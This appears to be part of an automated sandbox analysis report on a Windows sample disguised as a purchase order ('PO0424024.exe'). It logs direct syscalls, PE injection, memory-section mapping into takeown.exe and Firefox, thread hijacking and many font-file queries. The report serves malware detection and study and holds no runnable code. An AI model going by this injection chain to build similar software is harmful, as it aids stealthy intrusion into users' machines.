Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtQueryValueKey: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PO0424024.exe

Memory written: C:\Users\user\Desktop\PO0424024.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: NULL target: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: NULL target: C:\Windows\SysWOW64\takeown.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: NULL target: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: NULL target: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\takeown.exe

Thread register set: target process: 1700

Jump to behavior

Source: C:\Users\user\Desktop\PO0424024.exe	Process created: C:\Users\user\Desktop\PO0424024.exe "C:\Users\user\Desktop\PO0424024.exe"	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000000.2094779642.0000000001200000.00000002.00000001.00040000.00000000.sdmp, tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4170589534.0000000001201000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000000.2094779642.0000000001200000.00000002.00000001.00040000.00000000.sdmp, tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4170589534.0000000001201000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000000.2094779642.0000000001200000.00000002.00000001.00040000.00000000.sdmp, tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4170589534.0000000001201000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000000.2094779642.0000000001200000.00000002.00000001.00040000.00000000.sdmp, tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4170589534.0000000001201000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Users\user\Desktop\PO0424024.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
